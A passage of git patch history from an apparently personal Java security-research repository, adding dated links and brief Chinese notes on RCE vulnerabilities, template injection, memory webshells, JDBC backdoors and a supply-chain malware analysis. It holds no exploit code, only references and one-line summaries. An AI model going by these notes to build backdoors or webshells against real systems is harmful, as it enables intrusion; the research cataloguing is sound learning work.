"a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -196,4 +196,4 @@ + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) -+ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true** ++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** From 07720c45c22bba5002bf9d3a7623725d59d8ef80 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 11 Nov 2022 11:37:18 +0800 Subject: [PATCH 189/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f24bd56..59bfd5f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -197,3 +197,4 @@ + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** ++ 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) From 66cf07e40861319e9496f869f5f0bc076b502ca9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 11 Nov 2022 21:25:47 +0800 Subject: [PATCH 190/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 59bfd5f..3622e3f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -198,3 +198,4 @@ + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** + 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) ++ 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** From bcf52de768f34a5ec4346883ab62bf23d041ffb3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 11 Nov 2022 22:14:44 +0800 Subject: [PATCH 191/332] Create CVE-2022-42252.md --- tomcat/Smuggling/CVE-2022-42252.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 tomcat/Smuggling/CVE-2022-42252.md diff --git a/tomcat/Smuggling/CVE-2022-42252.md b/tomcat/Smuggling/CVE-2022-42252.md new file mode 100644 index 0000000..5430463 --- /dev/null +++ b/tomcat/Smuggling/CVE-2022-42252.md @@ -0,0 +1,3 @@ +https://www.xujun.org/note-154484.html + +![image](https://user-images.githubusercontent.com/63966847/201358116-b7c2e4de-0c57-461d-86b5-d370b62a5b6d.png) From a392d241bbc1fefb6197ebdced6b47fe756aa16b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 13 Nov 2022 02:01:59 +0800 Subject: [PATCH 192/332] Update Readme.md --- .../Velocity/Readme.md" | 5 +++++ 1 file changed, 5 insertions(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index f6c05c2..9c7d898 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -4,3 +4,8 @@ Confluence CVE-2019-3396 Jira CVE-2019-11581 +框架中的利用: + +https://xz.aliyun.com/t/11832 + +配合了fastjson 反序列化生成对象之后调用方法 From 6128099756ad6c518f98e7908731b72dcd2b4a70 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 19 Nov 2022 18:16:19 +0800 Subject: [PATCH 193/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3622e3f..225f958 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -199,3 +199,4 @@ + 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** + 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) + 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** ++ 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) From fa2f01f0e301bd8a36604eed063be0a3c9424286 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 19 Nov 2022 18:21:19 +0800 Subject: [PATCH 194/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 225f958..8360da3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -200,3 +200,4 @@ + 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) + 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) ++ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** From 7d54485b4ab8d17084b1ab28378258eebf095e4c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 20 Nov 2022 20:01:38 +0800 Subject: [PATCH 195/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8360da3..2e074c2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -201,3 +201,4 @@ + 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** ++ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) From 844dfd1d2ba34b857d20de7513f9b9d8af12fa46 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 22 Nov 2022 18:44:36 +0800 Subject: [PATCH 196/332] Update Readme.md --- "java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" index 722fd77..cfc36e4 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" @@ -11,6 +11,7 @@ + [Velocity模板注入](Velocity) **2021 四川省比赛省赛非攻Java logiclogic** 后缀名.vm [wp](https://mp.weixin.qq.com/s?__biz=MzI3NDEzNzIxMg==&mid=2650481832&idx=2&sn=7b092fc6e26c7d5f131b8ef7a30dc85c&chksm=f3172dbbc460a4ad99f29b445dd92873304d7c34798f977695ba775a5096a6b707106190a09f&mpshare=1&scene=23&srcid=0924Bci6wWhHifB6Y7Cmc5hl&sharer_sharetime=1632452737857&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + [beetl模板注入](Beetl) + [jfinalcms enjoy](jfinalcms_enjoy) **2021 字节ctf考察过。** ++ [Java FreeMarker 模板引擎注入深入分析](https://mp.weixin.qq.com/s/aYTp0suulfjQ5dcocS33Kg) ------------------------------------------------------------------------------------------------------------------------- # SSTI From a43731568a56fd2be95238ce312b70268ed3d834 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Nov 2022 19:48:20 +0800 Subject: [PATCH 197/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2e074c2..a2d7665 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -202,3 +202,4 @@ + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) ++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) From 07b6b7f7a5ab3d17fed2c347c4f2ffd8ab032c3b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Nov 2022 20:07:47 +0800 Subject: [PATCH 198/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a2d7665..4e36434 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -202,4 +202,4 @@ + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) -+ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) ++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** From b3ea51bfbe450ab23aaa7623a7d2174f83fd880a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 26 Nov 2022 21:59:40 +0800 Subject: [PATCH 199/332] =?UTF-8?q?Rename=20c=E8=AF=AD=E8=A8=80=E8=83=BD?= =?UTF-8?q?=E5=AE=9E=E7=8E=B0agent=3F!.md=20to=20c=E8=AF=AD=E8=A8=80?= =?UTF-8?q?=E8=83=BD=E5=AE=9E=E7=8E=B0agent=E5=90=97.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...0\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" => "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" (100%) diff --git "a/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" "b/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" similarity index 100% rename from "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" rename to "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" From f939b114f79692c1c31c007ddb4aa4ba8b47495c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 27 Nov 2022 11:38:32 +0800 Subject: [PATCH 200/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4e36434..e7ea0b0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -203,3 +203,4 @@ + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) + 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** ++ 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 2f4f6e6db79f31b3fadb0366806c4030a5250e29 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 30 Nov 2022 11:24:32 +0800 Subject: [PATCH 201/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e7ea0b0..0ac1427 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -204,3 +204,4 @@ + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) + 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** + 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** From 817c0d4703ab013050aad47b0c88ebc302183eae Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 30 Nov 2022 20:08:26 +0800 Subject: [PATCH 202/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0ac1427..331bb23 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -205,3 +205,4 @@ + 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** + 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** ++ 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** From 7ce6d3e9d7f78cf86bda961d7f7f903f857536ea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 2 Dec 2022 16:25:37 +0800 Subject: [PATCH 203/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 331bb23..dc792f6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -206,3 +206,4 @@ + 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** + 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** ++ 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** From 338a056bcaeba8ae2c391831d012ff2b9fdfd84c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 3 Dec 2022 00:30:14 +0800 Subject: [PATCH 204/332] Update README.md --- Struts2/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Struts2/README.md b/Struts2/README.md index bbe2332..5f8b882 100644 --- a/Struts2/README.md +++ b/Struts2/README.md @@ -19,3 +19,8 @@ [漏洞版本](http://archive.apache.org/dist/struts/binaries/) ![](./img/环境.png) + +## TODO +分析各个s2 漏洞 +s2-62 和新的 [https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) + From 8de7d2f2d33c9801e8fb01e3d326b78526e214e3 Mon Sep 17 00:00:00 2001 From: Firebasky 